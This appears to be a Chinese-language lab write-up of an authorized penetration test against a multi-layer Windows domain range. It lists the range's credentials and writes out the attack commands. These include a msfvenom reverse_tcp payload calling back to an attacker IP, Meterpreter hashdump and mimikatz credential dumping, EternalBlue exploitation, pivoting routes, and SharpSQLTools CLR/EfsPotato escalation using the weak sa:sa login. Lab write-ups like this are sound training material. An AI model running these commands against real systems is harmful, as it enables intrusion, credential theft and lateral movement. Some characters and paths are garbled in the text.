从外 打点到内 横向渗透——多层 络域渗透项目总结

本次多层 络域渗透项目旨在模拟渗透测试人员在授权的情况下对目标进行渗透测试, 从外 打点到内 横向渗透, 最终获取整个内 权限的过程.

靶场下载地址:

https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ提取码: vbi2

靶场 络拓扑图为:

各靶机信息:

域控: Windows Server 2008 + IIS + Exchange 2013 邮件服务目录还原密码: <a href="https://xz.aliyun.com/cdn-cgi/l/email-protection" data-cfemail="04766160706165692544">[email protected]</a>#45主机名: owa域管理员: administrator:Admin12345!域内服务器Mssql: Windows Server 2008 + SQL Server 2008 （被配置了非约束委派）主机名: sqlserver-2008本地管理员:Administrator:Admin12345域账户: redteamsqlserver:Server12345 （被配置了约束委派）Mssql: sa:sa域内个人PC: Windows 7主机名: work-7本地管理员:john: <a href="https://xz.aliyun.com/cdn-cgi/l/email-protection" data-cfemail="1d7c797074733c5d">[email protected]</a>#45域账户: redteamsaul:<a href="https://xz.aliyun.com/cdn-cgi/l/email-protection" data-cfemail="98f9fcf5f1f6b9d8">[email protected]</a>#45单机服务器: Windows server r2 + weblogic主机名: weblogic本地管理员:Administrator:Admin12345weblogic : weblogic: weblogic123（访问 http://ip:7001）weblogic 安装目录: C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain（手动运行下 startWebLogic.cmd）其他域用户: 域服务账户: redteamsqlserver:Server12345 （被配置了约束委派）邮件用户: redteammail:<a href="https://xz.aliyun.com/cdn-cgi/l/email-protection" data-cfemail="59383d3430377819">[email protected]</a>#45加域账户: redteamadduser:Add12345redteamsaulgoodman:Saul12345 （被配置了非约束委派）redteamgu:Gu12345redteamapt404:Apt12345

开启 Windows Server 2012 R2 后, 在 C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain 目录下双击 startWebLogic.cmd 启动 weblogic .

单机服务器

假定我们已经拿到了靶标 IP : 192.168.10.22 . 利用 Nmap 对靶标进行简易地扫描: nmap.exe -p1-65535 -Pn -A -T4 192.168.10.22 .

根据扫描结果发现 7001 端口存在 Oracle WebLogic , 扫一梭子看看有没有漏洞, 从扫描结果来看还是存在挺多漏洞的.

直接上工具开发, 发现是 administrator 的权限, 直接注入内存码, 冰蝎上线.

域内个人 PC

当拿下 DMZ 区域的机器后, 除了权限维持和权限提升, 对于横向渗透通常分以下两个方面:

由于我们拿下的机器已经是 administrator 权限, 直接进行信息搜集即可, tasklist 查看进程发现不存在杀软.

利用 msfvenom 生成一个 payload : msfvenom.bat -p
windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.9 LPORT=7777 -f exe > shell.exe , 上传到靶机后, MSF 上线.

抓一下密码:

run windows/gather/credentials/windows_autologinhashdump

拿到 Administrator 的密码 Admin12345 , 同时查询域信息: net view /domain , 发现该机器并不在域内.

查询 络信息发现是双 卡, 利用 fscan 扫描一下 段: fscan64.exe -h 10.10.20.0/24 > result.txt , 发现 段内存在新的机器 10.10.20.7 , 445 端口是开放的, 疑似存在 MS17-010 漏洞.

添加路由, 扫描一下 MS17-010 .

run get_local_subnetsrun autoroute -s 10.10.20.0/24run autoroute -psearch ms17-010use 3set rhost 10.10.20.7run

发现的确存在 MS17-010 , 利用
exploit/windows/smb/ms17_010_eternalblue 进行攻击, 成功拿下该机器.

search ms17-010use 0set payload windows/x64/meterpreter/bind_tcpset lport 11111run

先查看一下权限, 发现直接就是 system 权限, 也不需要进行提权的操作, 用 mimikatz 抓一下密码, 发现该主机在域环境 redteam.red 内, 并且拿到一组域账户的用户名和密码: saul:[email protected]#45 .

load mimikatzcreds_all

用其他的方式继续抓一下密码, 成功拿到一组本地用户的用户名及密码: john:[email protected]#45 .

hashdumprun windows/gather/smart_hashdumprun windows/gather/credentials/windows_autologin

域内服务器 Mssql

查看 段发现新 段, 继续添加路由.

上传一个 fscan , 扫描一下 段, 发现存在一台 Windows Server 2008 R2 机器: 10.10.10.18 , 开放了 1433 端口, 并且获得一组弱口令: sa:sa .

MSF 配合 Proxifier 开启 socks 代理隧道, 利用 SharpSQLTools 执行命令, 发现是 10.10.10.18 机器是一个低权限的账号 network service .

参考 MSSQL 利用 CLR 技术执行系统命令 中的方法, 进行 clr 提权, 成功提权到 system 权限.

SharpSQLTools.exe 10.10.10.18 sa sa master install_clrSharpSQLTools.exe 10.10.10.18 sa sa master enable_clrSharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

利用
exploit/windows/mssql/mssql_clr_payload 模块, 先用低权限账号上线, 接着上传木马, 利用 SharpSQLTools 运行得到高权限.